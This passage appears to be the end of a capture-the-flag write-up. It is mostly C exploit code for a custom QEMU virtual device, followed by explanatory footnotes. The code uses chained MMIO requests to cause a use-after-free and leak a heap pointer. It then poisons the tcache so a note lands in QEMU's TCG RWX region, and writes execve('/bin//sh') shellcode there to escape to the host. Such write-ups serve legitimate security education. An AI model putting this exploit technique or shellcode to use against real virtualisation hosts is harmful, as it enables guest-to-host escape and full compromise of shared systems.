((uint16_t*)dma_virt)[i] = i; } rwv_virt[0] = RWV(dma_phys, 0, 0x1000, 1); mmio_write(WRITE_RWV_LEN, 1); mmio_write(WRITE_NOTE_PROCESS_RWVEC, TRIGGER); // Allocate note #1 ~ 0x23 w/ size 0x405 // Note: 05 04 90 90 90 == add eax, 0x90909004 printf("[*] 3. Allocate notes #1 ~ 0x23\n"); mmio_write(WRITE_IDX, 0); mmio_write(WRITE_LEN_OR_OFS, 0x405); // For heap stability, it is best to do free, leak, allocs in a single RWvec request. // Thus, we use chained recursive MMIOs to run arbitrary MMIO operations. rwv_len = 0; for (int i = 1; i <= 0x23; i++) { rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_IDX, i*2, 2, 0); // WRITE_IDX = i rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0); // WRITE_NOTE_RESIZE } mmio_write(WRITE_RWV_LEN, rwv_len); mmio_write(WRITE_NOTE_PROCESS_RWVEC, TRIGGER); // Mark the chunks for identification (debug) mmio_write(WRITE_LEN_OR_OFS, 0x10 - 2); for (int i = 1; i <= 0x23; i++) { mmio_write(WRITE_IDX, i); mmio_write(WRITE_NOTE_SCALAR, i); } // Leak @ 0x20 with tcache 0x410: 0x22 -> 0x20 printf("[*] 4. Leak from note #0x20 by UAF\n"); mmio_write(WRITE_IDX, 0x20); mmio_write(WRITE_LEN_OR_OFS, 0x100); mmio_write(WRITE_NOTE_SCALAR, 0x20); mmio_write(WRITE_LEN_OR_OFS, 0x108); mmio_write(WRITE_NOTE_SCALAR, 0x22); mmio_write(WRITE_LEN_OR_OFS, 0x110); mmio_write(WRITE_NOTE_SCALAR, 0x405); mmio_write(WRITE_IDX, 0x80); mmio_write(WRITE_LEN_OR_OFS, 0x405); mmio_write(WRITE_NOTE_RESIZE, TRIGGER); mmio_write(WRITE_LEN_OR_OFS, 0); mmio_write(WRITE_NOTE_RESIZE, TRIGGER); mmio_write(WRITE_IDX, 0x20); rwv_len = 0; rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0); // WRITE_NOTE_RESIZE (free 0x20) rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_IDX, 0x108, 8, 0); // WRITE_IDX = 0x22 rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0); // WRITE_NOTE_RESIZE (free 0x22) rwv_virt[rwv_len++] = RWV(dma_phys, 0, 0x900, 0); // Leak heap data (prob (256-9)/256) rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_LEN_OR_OFS, 0x110, 8, 0); // WRITE_LEN_OR_OFS = 0x405 rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0); // WRITE_NOTE_RESIZE (reclaim 0x22) rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_IDX, 0x100, 8, 0); // WRITE_IDX = 0x20 rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0); // WRITE_NOTE_RESIZE (reclaim 0x20) mmio_write(WRITE_RWV_LEN, rwv_len); mmio_write(WRITE_NOTE_PROCESS_RWVEC, TRIGGER); // Mark the chunks for identification (debug) mmio_write(WRITE_LEN_OR_OFS, 0x10 - 2); mmio_write(WRITE_IDX, 0x20); mmio_write(WRITE_NOTE_SCALAR, 0x13370020); mmio_write(WRITE_IDX, 0x22); mmio_write(WRITE_NOTE_SCALAR, 0x13370022); // prot_ptr = ((heap_ptr+0x820)>>12) ^ heap_ptr // +0x820 may change 0x???000, so take this into account when decoding. uint64_t prot_ptr = *(uint64_t*)(dma_virt + 0x410*2 - 2), heap_ptr = 0; uint64_t tcache_key = *(uint64_t*)(dma_virt + 6); printf(" [*] tcache_key: %016llx\n", tcache_key); printf(" [+] prot_ptr: %p\n", prot_ptr); // Technically we have viable pointer leaks inside the leaked data, // but this is much more stable & explainable than using random leaks. heap_ptr |= prot_ptr & (0xfffULL << 36); heap_ptr |= (prot_ptr ^ (heap_ptr >> 12)) & (0xfffULL << 24); heap_ptr |= (prot_ptr ^ (heap_ptr >> 12)) & (0xfffULL << 12); if (((heap_ptr >> 12) & 0xf) == (prot_ptr & 0xf)) { heap_ptr |= (prot_ptr ^ (heap_ptr >> 12)) & 0xfffULL; } else if ((((heap_ptr >> 12) + 1) & 0xf) == (prot_ptr & 0xf)) { heap_ptr |= (prot_ptr ^ ((heap_ptr >> 12) + 1)) & 0xfffULL; } else { CHECK(false); } CHECK(((heap_ptr + 0x820) >> 12) ^ heap_ptr == prot_ptr); printf(" [+] heap_ptr: %p\n", heap_ptr); uint64_t rwx = (heap_ptr & ~0xffffffULL) + 0xc000000; printf(" [+] TCG RWX: %p\n", rwx); // Poison tcache, reclaim & pop shell printf("[*] 5. Poison tcache -> reclaim note @ RWX -> write -> shell!\n"); const uint8_t shellcode[] = { 0x31, 0xC0, 0x31, 0xF6, 0x31, 0xD2, 0x56, 0x48, 0xBF, 0x2F, 0x62, 0x69, 0x6E, 0x2F, 0x2F, 0x73, 0x68, 0x57, 0x54, 0x5F, 0xB0, 0x3B, 0x0F, 0x05 }; CHECK(sizeof(shellcode) == 8 * 3); uint64_t *dma_virt_u64 = dma_virt; uint16_t *dma_virt_u16; mmio_write(WRITE_IDX, 0x20); dma_virt_u64[0] = 0x20; dma_virt_u64[1] = 0x22; dma_virt_u64[2] = 0x405; dma_virt_u64[3] = 0x9090909090909090; // nop * 8 dma_virt_u64[4] = 0x303; dma_virt_u64[5] = ((uint64_t*)shellcode)[0]; dma_virt_u64[6] = 0x303 + 8; dma_virt_u64[7] = ((uint64_t*)shellcode)[1]; dma_virt_u64[8] = 0x303 + 0x10; dma_virt_u64[9] = ((uint64_t*)shellcode)[2]; dma_virt_u16 = dma_virt_u64 + 10; for (int i = 0; i < 0x300/8; i++) { dma_virt_u16[i] = 3 + i * 8; } rwv_virt[0] = RWV(dma_phys, 0x100, 80 + 0x300/8*2, 1); mmio_write(WRITE_RWV_LEN, 1); mmio_write(WRITE_NOTE_PROCESS_RWVEC, TRIGGER); mmio_write(WRITE_IDX, 0x81); mmio_write(WRITE_LEN_OR_OFS, 0x404); mmio_write(WRITE_NOTE_RESIZE, TRIGGER); mmio_write(WRITE_LEN_OR_OFS, 0); mmio_write(WRITE_NOTE_RESIZE, TRIGGER); mmio_write(WRITE_IDX, 0x20); *(uint64_t*)dma_virt = ((heap_ptr + 0x820) >> 12) ^ rwx; rwv_len = 0; rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0); // WRITE_NOTE_RESIZE (free 0x20) rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_IDX, 0x108, 8, 0); // WRITE_IDX = 0x22 rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0); // WRITE_NOTE_RESIZE (free 0x22) rwv_virt[rwv_len++] = RWV(dma_phys, 0x410*2 - 2, 8, 1); // Poison tcache rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_LEN_OR_OFS, 0x110, 8, 0); // WRITE_LEN_OR_OFS = 0x405 rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0); // WRITE_NOTE_RESIZE (reclaim 0x22) rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_IDX, 0x100, 8, 0); // WRITE_IDX = 0x20 rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_RESIZE, 0, 1, 0); // WRITE_NOTE_RESIZE (reclaim 0x20 @ RWX) for (int i = 0; i < 0x303/8; i++) { rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_LEN_OR_OFS, 0x100 + 80 + 2*i, 2, 0); // WRITE_LEN_OR_OFS = 3+i*8 rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_SCALAR, 0x118, 8, 0); // WRITE_NOTE_SCALAR = nop*8 } for (int i = 0; i < 3; i++) { rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_LEN_OR_OFS, 0x120 + 0x10*i, 8, 0); // WRITE_LEN_OR_OFS = 0x303+i*8 rwv_virt[rwv_len++] = RWV(mmio_phys + WRITE_NOTE_SCALAR, 0x128 + 0x10*i, 8, 0); // WRITE_NOTE_SCALAR = shellcode } printf(" [*] rwv_len: 0x%hx\n", rwv_len); mmio_write(WRITE_RWV_LEN, rwv_len); mmio_write(WRITE_NOTE_PROCESS_RWVEC, TRIGGER); printf("[!] Shellcode trigger failed, try writing shellcode several more times in vain\n"); mmio_write(WRITE_IDX, 0x20); memset(dma_virt, 0x90, 0x405); memcpy(dma_virt + 0x405 - sizeof(shellcode), shellcode, sizeof(shellcode)); rwv_virt[0] = RWV(dma_phys, 0, 0x405, 1); mmio_write(WRITE_RWV_LEN, 1); for (int i = 0; i < 0x100000; i++) { mmio_write(WRITE_NOTE_PROCESS_RWVEC, TRIGGER); } CHECK(("Unreachable, exploit failed", false)); return 0; } ``` </details> [Xion]: https://twitter.com/0x10n [^1]: Note that this does not allow arbitrary file writes since `sanitizeObject()` still uses the buggy regex but only processes keys one at a time recursively without the split-and-join operation. [^2]: One might notice that contrary to the response header showing `Content-Length: 0`, response is actually not empty: 1 first byte is returned. This is due to internal implementation details irrelevant to this chal, so let's skip this bug. [^3]: This is intended by the author so that players don't lose their way into finding a nonexistent stack overflow or exploiting the following 49 overwritable fields after `stack_guard`. Note the `-fstack-protector-all`! [^4]: All these can alternatively be found out by overwriting 2 pointers and re-entering the thread which aborts with `realloc(): invalid pointer` or `realloc(): invalid old size`, then checking backtrace with a debugger. [^5]: TCG buffers are allocated by default with the size of total system memory divided by 8 ([src](https://gitlab.com/qemu-project/qemu/-/blob/v7.1.0-rc3/tcg/region.c#L738)), which may result in nondeterministic offset between heap and RWX region if the buffer size is small. `-accel tcg,tb-size=64` is given to make it deterministic regardless of total system memory to ease exploitation, although technically one could leak RWX address from UAF read.